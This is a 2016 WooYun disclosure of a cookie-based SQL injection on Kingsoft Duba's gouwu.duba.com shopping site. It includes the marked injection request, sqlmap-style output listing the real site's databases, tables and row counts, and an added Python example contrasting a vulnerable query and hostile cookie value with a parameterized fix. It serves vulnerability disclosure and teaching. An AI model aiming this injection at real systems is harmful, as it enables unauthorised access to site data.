
Vulnerability summary

Defect ID: wooyun-2016-0196495

Title: Cookie injection on a Kingsoft Duba (金山毒霸) site

Vendor: Kingsoft Duba (金山毒霸)

Author: Vinc

Submitted: 2016-04-15 09:29

Fixed: 2016-05-30 10:00

Published: 2016-05-30 10:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor has confirmed

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-04-15: Details sent to the vendor; awaiting vendor handling
2016-04-15: Vendor has confirmed; details visible to the vendor only
2016-04-25: Details disclosed to core white hats and domain experts
2016-05-05: Details disclosed to regular white hats
2016-05-15: Details disclosed to intern white hats
2016-05-30: Details disclosed to the public

Brief description:

- - !

Detailed description:

The Cookie parameter warehouses is vulnerable to SQL injection (the `*` in the request below marks the injection point):
GET /xianshimai/ HTTP/1.1
Cookie: PHPSESSID=7j5nm06c6r44uqavifa6hk3al6; warehouses=*;
X-Requested-With: XMLHttpRequest
Referer: http://gouwu.duba.com
Host: gouwu.duba.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
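The report does not show the server-side code, so the following is an added illustration rather than the site's own code: a Python/sqlite3 stand-in for a PHP/MySQL handler that looks up a warehouse by the value of the `warehouses` cookie. The table name, columns and sample rows are constructed assumptions. It contrasts the vulnerable pattern (cookie value concatenated into SQL, which is what the report describes) with the hardened pattern (bound parameter plus an allowlist check on the cookie), and includes a minimal Cookie-header parser so the request above can be fed through it.

```python
import re
import sqlite3

# Constructed sample schema and rows (assumption; the report shows no schema).
SAMPLE_ROWS = [
    (1, "bj", "Beijing"),
    (2, "sh", "Shanghai"),
    (3, "gz", "Guangzhou"),
]

# Allowlist for the cookie: short lowercase codes only (assumed format).
WAREHOUSE_CODE_RE = re.compile(r"^[a-z]{2,8}$")


def make_db():
    """Create an in-memory database standing in for the site's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE warehouses (id INTEGER, code TEXT, city TEXT)")
    conn.executemany("INSERT INTO warehouses VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def parse_cookie_header(header):
    """Split a Cookie request-header value into a name -> value dict.

    Simplified parsing: 'a=1; b=2;' -> {'a': '1', 'b': '2'}. Cookies are
    attacker-controlled input exactly like query-string parameters.
    """
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        name, _, value = part.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


def lookup_vulnerable(conn, warehouses_cookie):
    """Vulnerable pattern: the cookie value is spliced into the SQL text."""
    sql = "SELECT city FROM warehouses WHERE code = '" + warehouses_cookie + "'"
    return [row[0] for row in conn.execute(sql)]


def is_valid_warehouse_code(value):
    """Allowlist check on the cookie value before it reaches the query."""
    return bool(WAREHOUSE_CODE_RE.match(value))


def lookup_safe(conn, warehouses_cookie):
    """Hardened pattern: allowlist the value, then bind it as a parameter.

    A bound parameter is sent to the database as data and is never parsed
    as SQL, so quote characters in the cookie cannot alter the statement.
    """
    if not is_valid_warehouse_code(warehouses_cookie):
        return []
    sql = "SELECT city FROM warehouses WHERE code = ?"
    return [row[0] for row in conn.execute(sql, (warehouses_cookie,))]


def handle_request(conn, cookie_header, safe=True):
    """Resolve the city for the 'warehouses' cookie taken from a raw header."""
    code = parse_cookie_header(cookie_header).get("warehouses", "")
    return lookup_safe(conn, code) if safe else lookup_vulnerable(conn, code)


if __name__ == "__main__":
    db = make_db()
    benign = "PHPSESSID=constructed-session-id; warehouses=bj;"
    hostile = "PHPSESSID=constructed-session-id; warehouses=' OR '1'='1;"
    print("vulnerable, benign cookie :", handle_request(db, benign, safe=False))
    print("vulnerable, hostile cookie:", handle_request(db, hostile, safe=False))
    print("safe, benign cookie       :", handle_request(db, benign))
    print("safe, hostile cookie      :", handle_request(db, hostile))
```

With the hostile cookie the concatenated query degenerates to `WHERE code = '' OR '1'='1'` and returns every row, while the parameterized version returns nothing because the value is rejected by the allowlist and, even without that check, would only ever be compared as a literal string. The same two-layer fix applies directly to the PHP/MySQL site in the report: validate the cookie, then use prepared statements (PDO or mysqli) for the lookup.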

Proof of vulnerability:

web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[08:18:43] [INFO] fetching current user
current user: 'gouwu_nav_sel@10.10.0.199'
available databases [3]:
[*] gouwu_nav
[*] information_schema
[*] test
Database: gouwu_nav
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| gouwu_site_items | 10422304 |
| gouwu_mobile_product | 1735034 |
| gouwu_maidian_items | 1304542 |
| gouwu_xianshimai_items | 201903 |
| gouwu_temai_brand_items | 182434 |
| gouwu_allbuy_items | 149596 |
| gouwu_app_publish_log | 114075 |
| gouwu_recommend_product | 113369 |
| gouwu_app_publish_log_day | 101946 |
| gouwu_zhidemai_items | 41462 |
| gouwu_ninenine_items | 33391 |
| gouwu_xianshigou_items | 31423 |
| gouwu_ninenine_blacklist | 23580 |
| gouwu_ninenine_tongji | 20406 |
| v9_log | 20131 |
| platform_account_base | 17700 |
| platform_account_info | 17700 |
| gouwu_site_s_logs | 17256 |
| gouwu_mobile_like | 15444 |
| gouwu_nineninebak_items | 11461 |
| gouwu_site_s_traderates | 9530 |
| gouwu_site_s_items | 6887 |
| gouwu_site_s_items_info | 6734 |
| gouwu_site_snoopy_item | 6603 |
| gouwu_ninenine_stat | 5022 |
| v9_linkage | 3284 |
| gouwu_site_temai_item | 2946 |
| gouwu_feed_back | 2684 |
| gouwu_search_keyword | 2000 |
| gouwu_xianshigou_brands | 1809 |
| gouwu_topic_goods | 1565 |
| gouwu_site_v5_stat | 1546 |
| gouwu_xianshimai_keyword | 1389 |
| gouwu_common_pictures | 1304 |
| gouwu_site_common_class | 1100 |
| gouwu_mobile_feedback | 1032 |
| gouwu_site_snoopy_shop | 929 |
| gouwu_xianshigou_search_keywords | 915 |
| gouwu_site_daquan | 902 |
| gouwu_site_s_stat | 858 |
| gouwu_site_batch_logs | 739 |
| gouwu_mingxing_pinterest | 391 |
| gouwu_common_link_items | 337 |
| gouwu_site_s_rule | 312 |
| v9_admin_role_priv | 309 |
| gouwu_site_business | 304 |
| v9_menu | 287 |
| gouwu_site_categorys | 270 |
| gouwu_site_tmall_temai_cat | 260 |
| gouwu_xianshigou_keywords | 207 |
| gouwu_site_s_sort | 198 |
| gouwu_recommend_sort | 192 |
| v9_attachment | 171 |
| gouwu_chaodian | 163 |
| gouwu_site_daquan_logowall | 159 |
| gouwu_site_t_master | 85 |
| gouwu_mingxing_news | 81 |
| gouwu_topic_items | 56 |
| gouwu_score_weight_config | 51 |
| gouwu_site_s_jizi | 44 |
| gouwu_app_update_log | 40 |
| gouwu_xianshigou_category | 40 |
| gouwu_mobile_slide | 37 |
| gouwu_app_publish_channel | 32 |
| gouwu_common_link_category | 32 |
| v9_cache | 26 |
| v9_module | 24 |
| gouwu_xianshimai_category | 18 |
| gouwu_home_category | 17 |
| gouwu_mingxing | 15 |
| gouwu_store_infoc | 14 |
| gouwu_chaodian_category | 12 |
| gouwu_topic_image | 12 |
| gouwu_topic_info | 12 |
| gouwu_xianshigou_filter_keywords | 11 |
| v9_admin | 10 |
| gouwu_xianshigou_weight | 9 |
| v9_urlrule | 9 |
| gouwu_app_list | 8 |
| v9_admin_role | 6 |
| gouwu_home_filter_keywords | 2 |
| platform_account_app | 1 |
| platform_account_project | 1 |
| v9_admin_panel | 1 |
| v9_site | 1 |
| v9_times | 1 |
+----------------------------------+---------+

Fix recommendation:

.

Copyright notice: when reposting, please credit the source: Vinc@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2016-04-15 09:52

Vendor reply:

Thanks for the submission; we will follow up and handle it right away.

Latest status:

None yet

